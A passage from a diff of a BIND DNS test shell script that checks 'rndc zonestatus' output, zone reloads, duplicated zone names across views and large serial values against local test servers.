status=`expr $status + 1` +fi + +# +echo_i "checking 'rdnc zonestatus' output" +ret=0 +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.1 zonestatus primary.example > rndc.out.pri 2>&1 + grep "zone not loaded" rndc.out.pri > /dev/null || break + sleep 1 +done +checkfor() { + grep "$1" $2 > /dev/null || { + ret=1; + echo_i "missing string '$1' from '$2'" + } +} +checkfor "name: primary.example" rndc.out.pri +checkfor "type: primary" rndc.out.pri +checkfor "files: primary.db, primary.db.signed" rndc.out.pri +checkfor "serial: " rndc.out.pri +checkfor "nodes: " rndc.out.pri +checkfor "last loaded: " rndc.out.pri +checkfor "secure: yes" rndc.out.pri +checkfor "inline signing: no" rndc.out.pri +checkfor "key maintenance: automatic" rndc.out.pri +checkfor "next key event: " rndc.out.pri +checkfor "next resign node: " rndc.out.pri +checkfor "next resign time: " rndc.out.pri +checkfor "dynamic: yes" rndc.out.pri +checkfor "frozen: no" rndc.out.pri +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.2 zonestatus primary.example > rndc.out.sec 2>&1 + grep "zone not loaded" rndc.out.sec > /dev/null || break + sleep 1 +done +checkfor "name: primary.example" rndc.out.sec +checkfor "type: secondary" rndc.out.sec +checkfor "files: sec.db" rndc.out.sec +checkfor "serial: " rndc.out.sec +checkfor "nodes: " rndc.out.sec +checkfor "next refresh: " rndc.out.sec +checkfor "expires: " rndc.out.sec +checkfor "secure: yes" rndc.out.sec +for i in 0 1 2 3 4 5 6 7 8 9 +do + $RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.prereload 2>&1 + grep "zone not loaded" rndc.out.prereload > /dev/null || break + sleep 1 +done +checkfor "files: reload.db, soa.db$" rndc.out.prereload +echo "@ 0 SOA . . 2 0 0 0 0" > ns1/soa.db +$RNDCCMD 10.53.0.1 reload reload.example | sed 's/^/ns1 /' | cat_i +for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS reload.example SOA @10.53.0.1 > dig.out + grep " 2 0 0 0 0" dig.out >/dev/null && break + sleep 1 +done +$RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.postreload 2>&1 +checkfor "files: reload.db, soa.db$" rndc.out.postreload +sleep 1 +echo "@ 0 SOA . . 3 0 0 0 0" > ns1/reload.db +echo "@ 0 NS ." >> ns1/reload.db +rndc_reload ns1 10.53.0.1 reload.example +for i in 0 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS reload.example SOA @10.53.0.1 > dig.out + grep " 3 0 0 0 0" dig.out >/dev/null && break + sleep 1 +done +$RNDCCMD 10.53.0.1 zonestatus reload.example > rndc.out.removeinclude 2>&1 +checkfor "files: reload.db$" rndc.out.removeinclude + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking 'rdnc zonestatus' with duplicated zone name" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus duplicate.example > rndc.out.duplicate 2>&1 +checkfor "zone 'duplicate.example' was found in multiple views" rndc.out.duplicate +$RNDCCMD 10.53.0.1 zonestatus duplicate.example in primary > rndc.out.duplicate 2>&1 +checkfor "name: duplicate.example" rndc.out.duplicate +$RNDCCMD 10.53.0.1 zonestatus nosuchzone.example > rndc.out.duplicate 2>&1 +checkfor "no matching zone 'nosuchzone.example' in any view" rndc.out.duplicate +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking 'rdnc zonestatus' with big serial value" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus bigserial.example > rndc.out.bigserial 2>&1 +checkfor "serial: 3003113544" rndc.out.bigserial +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 |